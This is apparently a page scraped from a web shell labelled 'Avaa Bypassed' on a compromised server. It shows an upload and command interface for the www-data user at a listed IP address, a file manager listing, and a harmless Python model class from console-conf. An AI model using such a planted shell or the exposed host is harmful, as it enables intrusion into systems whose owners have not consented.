[ Avaa Bypassed ]




Upload:

Command:

www-data@13.59.56.153: ~ $
from subiquitycore.models.network import NetworkModel
from .identity import IdentityModel


class ConsoleConfModel:
    """The overall model for console-conf."""

    def __init__(self):
        self.network = NetworkModel("console-conf")
        self.identity = IdentityModel()

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
tests Folder 0755
__init__.py File 2 B 0644
console_conf.py File 280 B 0644
identity.py File 1.2 KB 0644
systems.py File 7.09 KB 0644